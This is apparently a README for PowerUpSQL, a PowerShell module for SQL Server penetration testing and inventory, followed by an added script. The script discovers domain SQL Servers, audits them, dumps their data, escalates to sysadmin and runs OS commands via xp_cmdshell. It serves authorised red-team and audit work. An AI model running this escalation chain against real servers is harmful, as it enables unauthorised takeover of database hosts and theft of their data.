The PowerUpSQL module includes functions to support common attack workflows against SQL Server at scale, for use during internal penetration tests and red team engagements. It also includes many functions that administrators can use to inventory the SQL Servers on their Active Directory domain.
PowerUpSQL was designed with six objectives in mind:
+ Scalability: Multi-threading is supported on core functions so they can be executed against many SQL Servers quickly.
+ Portability: Default .net libraries are used and there are no dependencies on SQLPS or the SMO libraries. Functions have also been designed so they can be run independently.
+ Flexibility: PowerUpSQL functions support the PowerShell pipeline so they can be used together, and with other scripts.
+ Easy Server Discovery: Discovery functions can be used to blindly identify local, domain, and non-domain SQL Server instances at scale.
+ Easy Server Auditing: The Invoke-SQLAudit function can be used to audit for common high impact vulnerabilities and weak configurations using the current login’s privileges. Also, Invoke-SQLDumpInfo can be used to quickly inventory databases, privileges, and other information.
+ Easy Server Exploitation: The Invoke-SQLEscalatePriv function attempts to obtain sysadmin privileges using identified vulnerabilities.
Functions:
– Discovery Functions
These functions can be used for enumerating SQL Server instances. Discovered instances can then be piped into other PowerUpSQL functions.
– Primary Attack Functions
These are the functions used to quickly dump database information, audit for common vulnerabilities, and attempt to obtain sysadmin privileges.
– Core Functions
These functions are used to test connections, execute SQL Server queries, and execute OS commands. All other functions use these core functions. However, they can also be executed independently.
– Common Functions
These functions are used for common information gathering tasks. Similar to core functions, the common functions can be executed as standalone functions, but they are also used by other functions in the PowerUpSQL module.
– Audit Functions
These functions are used for identifying weak configurations that can lead to unauthorized access. Invoke-SQLAudit can be used to run all of them at once.
– Persistence Functions
These functions are used for maintaining access to the SQL Server using various methods. The roadmap for development is below. I’ve included a few links to standalone scripts that have not been integrated yet.
– Password Recovery Functions
These functions are used for recovering authentication tokens of various types. The roadmap for development is below. I’ve included a few links to standalone scripts that have not been integrated yet.
– Utility Functions
These are essentially helper functions. Some of them are used by other PowerUpSQL functions, but all of them can be run independently.
– Third Party Functions
A few PowerUpSQL functions use the third party functions below.
To use the module, type Import-Module PowerUpSQL.psd1
To list functions from the module, type Get-Command -Module PowerUpSQL
To list help for a function, type Get-Help FunctionName
To run as an alternative domain user, use the runas command to launch PowerShell first. Example: runas /noprofile /netonly /user:domain\user PowerShell.exe. With /netonly the supplied credentials are used only for network authentication (for example, the Kerberos or NTLM logon to SQL Server); the local process still runs as the logged-on user, so whoami will not show the new account even though the SQL Server connections will.
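The objectives and function categories above describe a discover, test, audit, inventory, escalate workflow. The script below is an added example that ties those steps together in one run; it is not code from the PowerUpSQL project. It assumes the module files are in .\PowerUpSQL\ under the current directory, that PowerShell is already running as the domain user you want to test with (or was started with the runas command above), and that the .\sqldump output folder name is a placeholder of your choosing.

```powershell
# Added example, not part of PowerUpSQL itself.
# Assumptions: module at .\PowerUpSQL\PowerUpSQL.psd1, current token is a domain user
# (or PowerShell was launched via runas /netonly), output folder name is a placeholder.

Import-Module .\PowerUpSQL\PowerUpSQL.psd1

# 1. Discovery: enumerate instances from SQL Server SPNs registered in the domain.
#    Get-SQLInstanceLocal and Get-SQLInstanceScanUDPThreaded cover local and
#    non-domain instances respectively.
$Instances = Get-SQLInstanceDomain -Verbose

# 2. Core: test which discovered instances the current login can actually reach,
#    multi-threaded. Only instances reported as 'Accessible' are worth auditing.
$Accessible = $Instances |
    Get-SQLConnectionTestThreaded -Threads 10 |
    Where-Object { $_.Status -like 'Accessible' }

# 3. Common: fingerprint each reachable instance (version, service account, and
#    whether the current login is already sysadmin). A high-privilege service
#    account such as LocalSystem or a domain admin is itself a finding.
$Accessible | Get-SQLServerInfo |
    Select-Object ComputerName, Instance, SQLServerVersionNumber, SQLServerEdition,
                  ServiceAccount, CurrentLogin, IsSysadmin |
    Format-Table -AutoSize

# 4. Audit: check for weak configurations using the current login's privileges.
#    Without -Exploit, Invoke-SQLAudit only reads; it does not change the server.
$Findings = $Accessible | Invoke-SQLAudit -Verbose
$Findings |
    Where-Object { $_.IsVulnerable -eq 'Yes' } |
    Select-Object Instance, Vulnerability, Severity, IsExploitable |
    Format-Table -AutoSize

# 5. Inventory: dump databases, logins, privileges, and other information to CSV
#    files in one folder so the results can be reviewed offline.
$Accessible | Invoke-SQLDumpInfo -Verbose -OutFolder .\sqldump

# 6. Exploitation: only against instances that are in scope for the engagement.
#    Invoke-SQLEscalatePriv re-runs the audit checks with exploitation enabled and
#    tries to reach sysadmin through the issues found in step 4.
$Accessible | Invoke-SQLEscalatePriv -Verbose

# 7. Verify where the current login is now sysadmin, and, on those instances only,
#    confirm OS command execution (Invoke-SQLOSCmd enables xp_cmdshell if needed).
$Accessible |
    Get-SQLSysadminCheck |
    Where-Object { $_.IsSysadmin -eq 'Yes' } |
    ForEach-Object {
        Invoke-SQLOSCmd -Verbose -Instance $_.Instance -Command 'whoami'
    }
```

Steps 1 through 5 are read-only against the target and are the part an administrator can run for an inventory; steps 6 and 7 change server configuration (sysadmin membership, xp_cmdshell) and should be run only where that is authorised. Because every function accepts the Instance property from the pipeline, any step can also be run on its own with -Instance "server\instance" instead of the discovered list.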